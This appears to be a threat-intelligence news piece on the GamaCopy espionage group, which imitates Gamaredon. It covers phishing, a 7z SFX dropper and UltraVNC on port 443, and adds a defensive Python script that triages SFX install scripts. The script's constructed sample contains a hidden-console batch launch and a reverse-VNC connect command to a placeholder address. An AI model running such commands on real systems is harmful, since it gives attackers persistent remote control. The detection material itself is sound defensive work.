GamaCopy mimics FSB-linked Gamaredon APT to launch attacks on Russia

A new cyber-espionage group, GamaCopy (also tracked as Core Werewolf), has been using military-themed lures to attack Russian organizations while imitating the tradecraft of Gamaredon, the well-known Russian hacking group. The campaign analyzed in the latest report has been running since June 2023 and targets critical sectors in Russia, including the defense industry and infrastructure, with the goal of stealing sensitive information.

GamaCopy has drawn attention for its "false flag" approach: it imitates the methods of Gamaredon, a Russian cyber-espionage group linked to the Federal Security Service (FSB), so that defenders misattribute its activity.

Gamaredon has targeted Ukrainian government agencies, non-governmental organizations, and the military since 2013. By tracing the origins of the attack samples, security researchers tied GamaCopy to Core Werewolf, a group that has mounted several attacks on Russian entities.

The latest report on the group's activities comes from the Chinese cybersecurity firm Knownsec 404, which analyzed attack samples aimed at Russian-speaking individuals. The firm found that the samples followed the same attack methodology as Gamaredon's, using military-related themes as bait.

GamaCopy's spear-phishing emails use military-related lures to get individuals in Russia's defense sector to open a malicious 7z self-extracting (SFX) archive. Once executed, the archive drops additional payloads that compromise the host; the attackers then install the open-source remote-access tool UltraVNC to keep persistent control of the compromised system.

The researchers note, however, that GamaCopy's tooling differs from Gamaredon's in detail. Where Gamaredon typically uses VBS scripts to install UltraVNC and its other payloads, GamaCopy relies on a more streamlined attack chain and points its UltraVNC connection at port 443 rather than port 5612, the port Gamaredon's deployments commonly use. A network detection keyed to 5612 will therefore miss this activity, and on 443 the VNC traffic sits alongside ordinary HTTPS.
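The dropper pattern above (a 7-Zip SFX stub whose install script launches the next stage, with UltraVNC reaching out on port 443) can be triaged statically. The following is an added example written for this page, not code from Knownsec 404 or from either threat group: it locates the embedded 7z archive in an SFX executable, pulls out the SFX install script that sits between the stub and the archive, and applies a few heuristics to the commands it runs. The sample bytes are constructed, the `winvnc.exe -connect host:443` command line is an assumed invocation used only to exercise the checks, and the heuristics are illustrative rather than vendor detection rules.

```python
import re
import struct
import zlib

# Markers of the 7-Zip container and of the SFX module's install script.
SEVEN_ZIP_MAGIC = b"7z\xbc\xaf\x27\x1c"
CONFIG_START = b";!@Install@!UTF-8!"
CONFIG_END = b";!@InstallEnd@!"
SCRIPT_EXT = re.compile(r"\.(bat|cmd|vbs|ps1|js)\b", re.I)


def find_archive(data: bytes) -> int:
    """Offset of the embedded 7z archive, or -1.

    The SFX stub's own code contains the six signature bytes as a constant, so
    the first match is usually a false positive; each candidate is validated
    against the CRC32 that the 7z start header stores over its next 20 bytes.
    """
    pos = data.find(SEVEN_ZIP_MAGIC)
    while pos >= 0:
        # layout: signature(6) version(2) StartHeaderCRC(4) StartHeader(20)
        stored = data[pos + 8:pos + 12]
        header = data[pos + 12:pos + 32]
        if len(header) == 20 and stored == struct.pack("<I", zlib.crc32(header)):
            return pos
        pos = data.find(SEVEN_ZIP_MAGIC, pos + 1)
    return -1


def extract_config(data: bytes, archive_at: int):
    """Install script text placed between stub and archive, or None.

    The stub also carries the marker strings as constants, so take the last
    start marker that precedes the archive rather than the first in the file.
    """
    start = data.rfind(CONFIG_START, 0, archive_at)
    if start < 0:
        return None
    end = data.find(CONFIG_END, start, archive_at)
    if end < 0:
        return None
    return data[start + len(CONFIG_START):end].decode("utf-8", "replace")


def parse_config(config: str) -> dict:
    """Parse key="value" lines; repeated keys (several RunProgram lines) keep order."""
    parsed = {}
    for m in re.finditer(r'^\s*(\w+)\s*=\s*"(.*)"\s*$', config, re.M):
        parsed.setdefault(m.group(1), []).append(m.group(2))
    return parsed


def suspicious_indicators(parsed: dict) -> list:
    """Illustrative heuristics for the dropper pattern described in the article."""
    hits = []
    for cmd in parsed.get("RunProgram", []) + parsed.get("ExecuteFile", []):
        low = cmd.lower()
        if low.startswith("hidcon:"):          # 7-Zip prefix: run with a hidden console
            hits.append("hidden console launch: " + cmd)
        if SCRIPT_EXT.search(cmd):
            hits.append("script launched after extraction: " + cmd)
        if "vnc" in low:
            hits.append("VNC component launched: " + cmd)
        if re.search(r":443\b", cmd):          # the port GamaCopy uses instead of 5612
            hits.append("remote endpoint on port 443: " + cmd)
    return hits


def triage(data: bytes) -> dict:
    """Run the whole check on one file image."""
    archive_at = find_archive(data)
    if archive_at < 0 or data[:2] != b"MZ":
        return {"is_7z_sfx": False, "archive_offset": None, "config": {}, "indicators": []}
    config = extract_config(data, archive_at)
    parsed = parse_config(config) if config else {}
    return {"is_7z_sfx": True, "archive_offset": archive_at,
            "config": parsed, "indicators": suspicious_indicators(parsed)}


# --- constructed sample, not a real malware file ----------------------------
_start_header = struct.pack("<QQI", 0, 0, 0)                     # empty archive body
_good_crc = struct.pack("<I", zlib.crc32(_start_header))
_bad_crc = struct.pack("<I", zlib.crc32(_start_header) ^ 0xFFFFFFFF)
SAMPLE_SFX = (
    b"MZ" + b"\x90" * 62                                         # fake PE stub
    # the stub's own constants: a signature with a wrong CRC and the bare markers
    + SEVEN_ZIP_MAGIC + b"\x00\x04" + _bad_crc + _start_header
    + CONFIG_START + CONFIG_END
    + b"\x90" * 16
    # the real install script, then the real archive
    + CONFIG_START
    + b'\nTitle="Report"\nRunProgram="hidcon:cmd.exe /c install.bat"\n'
    + b'RunProgram="winvnc.exe -connect 203.0.113.10:443"\n'    # assumed reverse-VNC invocation
    + CONFIG_END
    + SEVEN_ZIP_MAGIC + b"\x00\x04" + _good_crc + _start_header
)

if __name__ == "__main__":
    for line in triage(SAMPLE_SFX)["indicators"]:
        print(line)
```

Run against the constructed sample, the script skips the decoy signature inside the stub, recovers both RunProgram lines and reports the hidden-console launch, the batch script, the VNC binary and the port 443 endpoint. On a real sample the same approach yields the install script to pivot on and the archive offset to carve with a 7z tool.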

The group appears to have been active since at least August 2021, although its more notable attacks began in mid-2023.
